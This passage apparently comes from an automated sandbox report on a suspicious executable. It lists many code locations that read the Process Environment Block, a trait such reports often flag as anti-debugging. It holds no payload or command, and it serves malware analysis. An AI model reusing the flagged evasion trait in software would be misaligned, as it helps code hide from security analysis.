          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A9F0BF mov eax, dword ptr fs:[00000030h]1_2_00A9F0BF
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A69080 mov eax, dword ptr fs:[00000030h]1_2_00A69080
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE3884 mov eax, dword ptr fs:[00000030h]1_2_00AE3884
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE3884 mov eax, dword ptr fs:[00000030h]1_2_00AE3884
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A658EC mov eax, dword ptr fs:[00000030h]1_2_00A658EC
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AFB8D0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AFB8D0 mov ecx, dword ptr fs:[00000030h]1_2_00AFB8D0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AFB8D0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AFB8D0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AFB8D0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AFB8D0 mov eax, dword ptr fs:[00000030h]1_2_00AFB8D0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A9002D mov eax, dword ptr fs:[00000030h]1_2_00A9002D
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A9002D mov eax, dword ptr fs:[00000030h]1_2_00A9002D
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A9002D mov eax, dword ptr fs:[00000030h]1_2_00A9002D
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A9002D mov eax, dword ptr fs:[00000030h]1_2_00A9002D
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A9002D mov eax, dword ptr fs:[00000030h]1_2_00A9002D
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A7B02A mov eax, dword ptr fs:[00000030h]1_2_00A7B02A
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A7B02A mov eax, dword ptr fs:[00000030h]1_2_00A7B02A
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A7B02A mov eax, dword ptr fs:[00000030h]1_2_00A7B02A
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A7B02A mov eax, dword ptr fs:[00000030h]1_2_00A7B02A
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B34015 mov eax, dword ptr fs:[00000030h]1_2_00B34015
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B34015 mov eax, dword ptr fs:[00000030h]1_2_00B34015
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE7016 mov eax, dword ptr fs:[00000030h]1_2_00AE7016
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE7016 mov eax, dword ptr fs:[00000030h]1_2_00AE7016
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE7016 mov eax, dword ptr fs:[00000030h]1_2_00AE7016
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B22073 mov eax, dword ptr fs:[00000030h]1_2_00B22073
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B31074 mov eax, dword ptr fs:[00000030h]1_2_00B31074
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A80050 mov eax, dword ptr fs:[00000030h]1_2_00A80050
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A80050 mov eax, dword ptr fs:[00000030h]1_2_00A80050
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE69A6 mov eax, dword ptr fs:[00000030h]1_2_00AE69A6
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A961A0 mov eax, dword ptr fs:[00000030h]1_2_00A961A0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A961A0 mov eax, dword ptr fs:[00000030h]1_2_00A961A0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE51BE mov eax, dword ptr fs:[00000030h]1_2_00AE51BE
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE51BE mov eax, dword ptr fs:[00000030h]1_2_00AE51BE
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE51BE mov eax, dword ptr fs:[00000030h]1_2_00AE51BE
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE51BE mov eax, dword ptr fs:[00000030h]1_2_00AE51BE
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A8C182 mov eax, dword ptr fs:[00000030h]1_2_00A8C182
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A9A185 mov eax, dword ptr fs:[00000030h]1_2_00A9A185
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A92990 mov eax, dword ptr fs:[00000030h]1_2_00A92990
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A6B1E1
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A6B1E1
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A6B1E1 mov eax, dword ptr fs:[00000030h]1_2_00A6B1E1
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AF41E8 mov eax, dword ptr fs:[00000030h]1_2_00AF41E8
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A84120 mov eax, dword ptr fs:[00000030h]1_2_00A84120
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A84120 mov eax, dword ptr fs:[00000030h]1_2_00A84120
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A84120 mov eax, dword ptr fs:[00000030h]1_2_00A84120
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A84120 mov eax, dword ptr fs:[00000030h]1_2_00A84120
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A84120 mov ecx, dword ptr fs:[00000030h]1_2_00A84120
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A9513A mov eax, dword ptr fs:[00000030h]1_2_00A9513A
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A9513A mov eax, dword ptr fs:[00000030h]1_2_00A9513A
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A69100 mov eax, dword ptr fs:[00000030h]1_2_00A69100
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A69100 mov eax, dword ptr fs:[00000030h]1_2_00A69100
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A69100 mov eax, dword ptr fs:[00000030h]1_2_00A69100
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A6C962 mov eax, dword ptr fs:[00000030h]1_2_00A6C962
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A6B171 mov eax, dword ptr fs:[00000030h]1_2_00A6B171
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A6B171 mov eax, dword ptr fs:[00000030h]1_2_00A6B171
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A8B944 mov eax, dword ptr fs:[00000030h]1_2_00A8B944
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A8B944 mov eax, dword ptr fs:[00000030h]1_2_00A8B944
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A652A5 mov eax, dword ptr fs:[00000030h]1_2_00A652A5
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A652A5 mov eax, dword ptr fs:[00000030h]1_2_00A652A5
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A652A5 mov eax, dword ptr fs:[00000030h]1_2_00A652A5
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A652A5 mov eax, dword ptr fs:[00000030h]1_2_00A652A5
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A652A5 mov eax, dword ptr fs:[00000030h]1_2_00A652A5
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A7AAB0 mov eax, dword ptr fs:[00000030h]1_2_00A7AAB0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A7AAB0 mov eax, dword ptr fs:[00000030h]1_2_00A7AAB0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A9FAB0 mov eax, dword ptr fs:[00000030h]1_2_00A9FAB0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A9D294 mov eax, dword ptr fs:[00000030h]1_2_00A9D294
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A9D294 mov eax, dword ptr fs:[00000030h]1_2_00A9D294
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A92AE4 mov eax, dword ptr fs:[00000030h]1_2_00A92AE4
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A92ACB mov eax, dword ptr fs:[00000030h]1_2_00A92ACB
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA4A2C mov eax, dword ptr fs:[00000030h]1_2_00AA4A2C
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA4A2C mov eax, dword ptr fs:[00000030h]1_2_00AA4A2C
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B2AA16 mov eax, dword ptr fs:[00000030h]1_2_00B2AA16
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B2AA16 mov eax, dword ptr fs:[00000030h]1_2_00B2AA16
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A78A0A mov eax, dword ptr fs:[00000030h]1_2_00A78A0A
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A6AA16 mov eax, dword ptr fs:[00000030h]1_2_00A6AA16
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A6AA16 mov eax, dword ptr fs:[00000030h]1_2_00A6AA16
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A83A1C mov eax, dword ptr fs:[00000030h]1_2_00A83A1C
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A65210 mov eax, dword ptr fs:[00000030h]1_2_00A65210
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A65210 mov ecx, dword ptr fs:[00000030h]1_2_00A65210
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A65210 mov eax, dword ptr fs:[00000030h]1_2_00A65210
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A65210 mov eax, dword ptr fs:[00000030h]1_2_00A65210
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA927A mov eax, dword ptr fs:[00000030h]1_2_00AA927A
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B1B260 mov eax, dword ptr fs:[00000030h]1_2_00B1B260
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B1B260 mov eax, dword ptr fs:[00000030h]1_2_00B1B260
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B38A62 mov eax, dword ptr fs:[00000030h]1_2_00B38A62
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A69240 mov eax, dword ptr fs:[00000030h]1_2_00A69240
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A69240 mov eax, dword ptr fs:[00000030h]1_2_00A69240
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A69240 mov eax, dword ptr fs:[00000030h]1_2_00A69240
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A69240 mov eax, dword ptr fs:[00000030h]1_2_00A69240
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B2EA55 mov eax, dword ptr fs:[00000030h]1_2_00B2EA55
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AF4257 mov eax, dword ptr fs:[00000030h]1_2_00AF4257
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A94BAD mov eax, dword ptr fs:[00000030h]1_2_00A94BAD
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A94BAD mov eax, dword ptr fs:[00000030h]1_2_00A94BAD
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A94BAD mov eax, dword ptr fs:[00000030h]1_2_00A94BAD
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B35BA5 mov eax, dword ptr fs:[00000030h]1_2_00B35BA5
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A71B8F mov eax, dword ptr fs:[00000030h]1_2_00A71B8F
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A71B8F mov eax, dword ptr fs:[00000030h]1_2_00A71B8F
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B1D380 mov ecx, dword ptr fs:[00000030h]1_2_00B1D380
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B2138A mov eax, dword ptr fs:[00000030h]1_2_00B2138A
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A9B390 mov eax, dword ptr fs:[00000030h]1_2_00A9B390
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A92397 mov eax, dword ptr fs:[00000030h]1_2_00A92397
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A8DBE9 mov eax, dword ptr fs:[00000030h]1_2_00A8DBE9
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]1_2_00A903E2
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]1_2_00A903E2
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]1_2_00A903E2
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]1_2_00A903E2
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]1_2_00A903E2
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A903E2 mov eax, dword ptr fs:[00000030h]1_2_00A903E2
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE53CA mov eax, dword ptr fs:[00000030h]1_2_00AE53CA
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE53CA mov eax, dword ptr fs:[00000030h]1_2_00AE53CA
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B2131B mov eax, dword ptr fs:[00000030h]1_2_00B2131B
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A6DB60 mov ecx, dword ptr fs:[00000030h]1_2_00A6DB60
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A93B7A mov eax, dword ptr fs:[00000030h]1_2_00A93B7A
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A93B7A mov eax, dword ptr fs:[00000030h]1_2_00A93B7A
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A6DB40 mov eax, dword ptr fs:[00000030h]1_2_00A6DB40
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B38B58 mov eax, dword ptr fs:[00000030h]1_2_00B38B58
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A6F358 mov eax, dword ptr fs:[00000030h]1_2_00A6F358
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A7849B mov eax, dword ptr fs:[00000030h]1_2_00A7849B
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B214FB mov eax, dword ptr fs:[00000030h]1_2_00B214FB
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]1_2_00AE6CF0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]1_2_00AE6CF0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE6CF0 mov eax, dword ptr fs:[00000030h]1_2_00AE6CF0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B38CD6 mov eax, dword ptr fs:[00000030h]1_2_00B38CD6
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A9BC2C mov eax, dword ptr fs:[00000030h]1_2_00A9BC2C
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE6C0A mov eax, dword ptr fs:[00000030h]1_2_00AE6C0A
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE6C0A mov eax, dword ptr fs:[00000030h]1_2_00AE6C0A
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE6C0A mov eax, dword ptr fs:[00000030h]1_2_00AE6C0A
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE6C0A mov eax, dword ptr fs:[00000030h]1_2_00AE6C0A
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B21C06 mov eax, dword ptr fs:[00000030h]1_2_00B21C06
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B3740D mov eax, dword ptr fs:[00000030h]1_2_00B3740D
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B3740D mov eax, dword ptr fs:[00000030h]1_2_00B3740D
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B3740D mov eax, dword ptr fs:[00000030h]1_2_00B3740D
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A8746D mov eax, dword ptr fs:[00000030h]1_2_00A8746D
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A9A44B mov eax, dword ptr fs:[00000030h]1_2_00A9A44B
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AFC450 mov eax, dword ptr fs:[00000030h]1_2_00AFC450
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AFC450 mov eax, dword ptr fs:[00000030h]1_2_00AFC450
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A935A1 mov eax, dword ptr fs:[00000030h]1_2_00A935A1
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A91DB5 mov eax, dword ptr fs:[00000030h]1_2_00A91DB5
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A91DB5 mov eax, dword ptr fs:[00000030h]1_2_00A91DB5
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A91DB5 mov eax, dword ptr fs:[00000030h]1_2_00A91DB5
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B305AC mov eax, dword ptr fs:[00000030h]1_2_00B305AC
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B305AC mov eax, dword ptr fs:[00000030h]1_2_00B305AC
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A92581 mov eax, dword ptr fs:[00000030h]1_2_00A92581
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A92581 mov eax, dword ptr fs:[00000030h]1_2_00A92581
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A92581 mov eax, dword ptr fs:[00000030h]1_2_00A92581
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A92581 mov eax, dword ptr fs:[00000030h]1_2_00A92581
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A62D8A mov eax, dword ptr fs:[00000030h]1_2_00A62D8A
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A62D8A mov eax, dword ptr fs:[00000030h]1_2_00A62D8A
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A62D8A mov eax, dword ptr fs:[00000030h]1_2_00A62D8A
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A62D8A mov eax, dword ptr fs:[00000030h]1_2_00A62D8A
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A62D8A mov eax, dword ptr fs:[00000030h]1_2_00A62D8A
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A9FD9B mov eax, dword ptr fs:[00000030h]1_2_00A9FD9B
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A9FD9B mov eax, dword ptr fs:[00000030h]1_2_00A9FD9B
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B18DF1 mov eax, dword ptr fs:[00000030h]1_2_00B18DF1
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A7D5E0 mov eax, dword ptr fs:[00000030h]1_2_00A7D5E0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A7D5E0 mov eax, dword ptr fs:[00000030h]1_2_00A7D5E0
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B2FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B2FDE2
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B2FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B2FDE2
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B2FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B2FDE2
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B2FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B2FDE2
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AE6DC9
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AE6DC9
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AE6DC9
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE6DC9 mov ecx, dword ptr fs:[00000030h]1_2_00AE6DC9
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AE6DC9
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AE6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AE6DC9
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B38D34 mov eax, dword ptr fs:[00000030h]1_2_00B38D34
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00B2E539 mov eax, dword ptr fs:[00000030h]1_2_00B2E539
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A94D3B mov eax, dword ptr fs:[00000030h]1_2_00A94D3B
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A94D3B mov eax, dword ptr fs:[00000030h]1_2_00A94D3B
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A94D3B mov eax, dword ptr fs:[00000030h]1_2_00A94D3B
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A73D34 mov eax, dword ptr fs:[00000030h]1_2_00A73D34
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A6AD30 mov eax, dword ptr fs:[00000030h]1_2_00A6AD30
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AEA537 mov eax, dword ptr fs:[00000030h]1_2_00AEA537
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A8C577 mov eax, dword ptr fs:[00000030h]1_2_00A8C577
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00A8C577 mov eax, dword ptr fs:[00000030h]1_2_00A8C577
          Source: C:\Users\user\Desktop\h8lD4SWL35.exeCode function: 1_2_00AA3D43 mov eax, dword ptr fs:[00000030h]1_2_00AA3D43
